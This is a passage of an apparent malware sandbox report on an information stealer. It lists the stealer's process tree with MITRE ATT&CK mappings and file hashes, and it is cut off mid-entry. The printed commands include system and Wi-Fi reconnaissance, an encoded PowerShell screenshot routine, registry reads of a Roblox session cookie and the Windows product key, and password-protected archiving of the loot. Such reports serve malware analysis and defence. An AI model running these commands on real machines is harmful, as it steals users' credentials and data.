    PID:3964
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:8
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:4436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3464
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjyavkwz\rjyavkwz.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4880
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD561.tmp" "c:\Users\Admin\AppData\Local\Temp\rjyavkwz\CSCAD0C2F8615C341C9A4E96737366D2F4E.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1252
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5072
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2504
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4552
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3772
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:908
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3400
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\ctkKd.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:476
  - - C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\ctkKd.zip" *
      4⤵
      Executes dropped EXE
      PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4408
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3052
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4780
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:952
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4936
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:792
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
4eeab497d4bd6baf5014b1eb05f6d3aa

SHA1
fb3ab7bcef9705d14799c079a6b824d54bc13da9

SHA256
4626657812181188279c8322bd6e4592501724258a90ea9e2f48d754e96cb5c3

SHA512
c13bba70059c3b9a0a14abd2be0b89ecf47271138192d820f162c728b6b8104accb83d3d3e0e6414665eae6d679a9e1fcfd64536b3a5ecedb40b42850f2d4fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6cfc2981eb56d06bbf348fcb74d25870

SHA1
ea194bcad9f8d4c17e26a62c40050b16876e1720

SHA256
32988831d80e7dee565084cf7cc5191c4425993dbd4da8d87dc15e8e895b7f05

SHA512
5b1c518ab6e18fac5907aea9cec00e37b47dadaf4c1fc7665bfc958abb7631bd9745964faca8ae18d629fe0ac7d93a5dd13439c659a47c9af5134736fb746454

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2736d2583a325546404fa96adc1a219e

SHA1
58b4404b33307759d71649ad6e9e38ed49bb6c1d

SHA256
edb7da960b386ab20dac771bd693394363bc6733a74fd50183ba847bb6432dc1

SHA512
2e1a098b25969aeffcb828c2d166476a64840772ff836b4a21b779dd94e7a42b71631516d518d0f9a1afe90b6e62cfa0d5d214251d10a6eeadb16dba7c9ed5c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
692b595dd32684cd23aca924079e55b0

SHA1
8f32f51948eb464cb8d9e6a209ba4b8794efdbba

SHA256
261322d0a047e93801c45593ff820c259fe90207137c3006946b17b44964af69

SHA512
a3f5bed29db08a358feda3801752c3996d3d4f01ca07340be9c0b9e7923a3269c2e4a20370bb8138c98be97a90fed41e74e255b350ca54d72a48c1cf5980b76e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
50576119caf4f8469a47c31b70914182

SHA1
47ccfbed86703b48c6b599c53f070dc330d88f0d

SHA256
732330f63ee115ba2fe1db982d47a55fee0546b044c4ae4c701389fc2a98042b

SHA512
60eca5194c27914f69a65c4339f989daa09b7214d7d06ccbe33c4b812619c7617a381b008d701ff70e6cc43ec353bc4d641c7ddafd6ed861d18383e02a7474ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b7ead2d4f3d4eefa2cbf20e5b36bcb1b

SHA1
5ef427b47ce9f9ba01cc04a32c9d05faf1e85c55

SHA256
1f0d08ef46827e706a7b3686e109903f4d29f0ca3d0d8a6fdec3c90820c687f7

SHA512
8b75c1af81045b6b38be8c183c9c3e49bfd03b8f89441ba4fbcdf22dfabec054d51b7b7d8d2dc8bb05299ed7ff9d6813b2a333455ca5c0d105335f17c430d4db

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD561.tmp

Filesize
1KB

MD5
de9bc45eb95d618cf713a5abc949c37c

SHA1
3f674ce8f0e67e879cdeb39cc302098344b2de13

SHA256
eff1310abbd84c80c36780f2a064d3d55445b46517209cb9944c6178d60ac722

SHA512
eb7feef98653401a0706c6341892a8924fc11c66658dd1bc30202f41585302848bb2cedecf6a04966022c128cb55e9cf5c6779c75e9832c8c58f2faa90ac692a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\VCRUNTIME140.dll

Filesize
88KB

MD5
a0df29af5f6135b735dee359c0871ecf

SHA1
f7ebb9a9fd00e1ac95537158fae1167b06f490bd

SHA256
35afadbacc9a30341c1a5ee2117e69583e5044cea0bfab636dccbdcc281a8786

SHA512
fdc7a62d0b187829708ec544de52b4037da613e01a7591a2abc55f95c4719ee04f9c51d31f01edb7161b5edc3cd85004c3a55d375116baa76fb44553df592b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_bz2.pyd

Filesize
44KB

MD5
04006baa3fdda07ad06790c814130025

SHA1
7ae71d19d31a38fa4cd06f38b1780176e9837747

SHA256
65345e9fb47a8e07135a8df71690966756fb3a16601ea76e1c37cb5a85687959

SHA512
0c1b27e18455bd966df67b719507afa9b83b0a134b985361efa13dd6001c37dc48a8c119847215235c0f8e47c6c3bc2fb2be8b5854f51368dc28f4f2df36830a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ctypes.pyd

Filesize
52KB

MD5
e6f488f9ef063cec266cb03ecde771e9

SHA1
8f9b7780df25867599cf92f42ad7dab5cc37c60b

SHA256
1ea6ecb02632b85e278a4a74d5560662b6a9652ee8c03214139a00935abd4d3f

SHA512
47d57e082e1e172612efb364d44a407fb3dafb4efc6de02585f62bc65d39b57f233a0cdd9b3c2bd0539288b08176bd165cc1290319e861c35f5c3c877a930156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_decimal.pyd

Filesize
79KB

MD5
e70eb2dff120e954a305c37d1ff6c19b

SHA1
246618204685a5e1d30f4a3d18a298441c65df8f

SHA256
ecbf5f140349137a46609bfb625572907deb211005c4cc0eca6875770af47f25

SHA512
15bbdad7358da39e2348986dd96f19c88d8bad83c3de0cf14b3d22205ba9c4cf0beb09d7dbaebe65af5b532b343c1336596e3754606a409c3e6f56ca0d29d3c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_hashlib.pyd

Filesize
30KB

MD5
afd1f13811e21a9a303d633cc3081d18

SHA1
d9736b444a27b0d3a13bc95d579445f9e72af99a

SHA256
052edf9eb0742063050ddb59810c34c7d640748ed760408299b6821e095922c8

SHA512
4a76a4c52f2983ea7f141343d08e32b11fc499c87282e44bd77ef50259f544e8212db235ef9cd541337fdc8fb872f34f58be3a343e7c70b29a822e3f2363e934

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_lzma.pyd

Filesize
79KB

MD5
9f4917705676062bebc879968a0d24d1

SHA1
751d9e6dae9e43eba719b36875ed89801cc1f07e

SHA256
11fc0bbe22dcdba2f4952eb38ab31447833d52c624d97253ae08a77ff65415b2

SHA512
b89df73d3980a56b2a88a6ba001e894be6f70bcbbc1d498f9cfd6981bae934d3a0193ddde75252556f1fe3ce942db4b5dcfea1982ebbbf5b9ec29a08b3e7088a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_queue.pyd

Filesize
24KB

MD5
f59da07dbbdd126cfbd617191e08d949

SHA1
f9a9f0e453cf4c2cde6511817eebe262e5f7df7e

SHA256
0a39726fe4e2da50c419b8ecf159c5f434854abd20103a89abe2aa378d8e5240

SHA512
c5e5941dd6e6bece7c0fb588254b82fe16563cfeab0fb27764466b55c7ac0a70b6dd3bca377807a3a4509ac27cc7e34ad16402d9992b3da02d726f02ed98b75f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33762\_socket.pyd

Filesize
38KB

MD5
88b9bf60bea71ef90af7223ebe895319

SHA1
3272cab72a29855eefd68a2b85300c85553020d9

SHA256
fccad475b318a8ccdbb7cf05743be5d47a64d93615922bc0a890ab04f5319b26

SHA512
